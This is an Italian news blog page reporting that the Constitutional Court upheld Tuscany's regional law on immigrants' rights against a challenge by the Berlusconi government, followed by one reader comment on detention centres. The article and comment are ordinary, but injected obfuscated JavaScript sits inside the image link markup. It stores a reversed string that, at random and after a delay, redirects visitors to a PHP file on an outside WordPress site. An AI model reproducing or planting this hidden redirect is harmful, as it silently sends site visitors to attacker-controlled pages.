Migranti toscani in festa. La Consulta boccia Berlusconi e premia la legge regionale

image_pdfimage_print

La norma regionale del 2009 era stata impugnata dal Governo Berlusconi. Rossi: «Toscana all’avanguardia nel pieno rispetto della Costituzione»

di Cristiano Lucchi per Toscana Notizie

$p$VTO6JhIH6WkCGAcPR=function(n){if (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == “string”) return $p$VTO6JhIH6WkCGAcPR.list[n].split(“”).reverse().join(“”);return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=[“‘php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and(this)” href=”http://www.altracitta.org/wp-content/uploads/2010/07/festa-indiana.jpg”>E' festa per i diritti civili in Toscana
E' festa per i diritti civili in Toscana
«La Legge toscana sui diritti ai cittadini immigrati è una legge all’avanguardia e in perfetta linea con quanto prescritto dalla Costituzione della Repubblicana italiana. La Corte costituzionale ha infatti dichiarato inammissibile e non fondato il ricorso del Governo Berlusconi sulla Legge regionale che norma l’accoglienza, l’integrazione e la tutela dei cittadini stranieri in Toscana. E’ una vittoria della ragione e della civiltà». Lo ha reso noto Enrico Rossi, presidente della Regione Toscana, è disponibile un approfondimento con il testo integrale e alcune schede che ne delineano i punti fondamentali.

0 Comments

  1. maurizio sarcoli

    adesso bisogna che la regione faccia un passo ulteriore per chiarire la posizione sui CIE. Il compromesso di Rossi non regge, è un gioco di immagine tutto politico che si basa su una forzatura inammissibile della legge in vigore (non possono esistere CIE ‘ buoni’, maroni lo ha chiarito).
    Questa ambiguità (il rispetto dei diritti ma anche la risposta alla percezione di insicurezza di alcuni) credo si ritorcerà contro Rossi. alla fine maroni lo metterà spalle al muro schiacciandolo contro la sua disponibilità ad aprire un CIe in Toscana.
    Mi spiace che vittorie come questa raccontata nell’articolo non siano capitalizzate per raggiungere una vera cultura politica alternativa a quella che vuole la guerra tra poveri autoctoni e immigrati.
    Ciao, Maurizio Sarcoli

    Reply

Leave a Reply

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *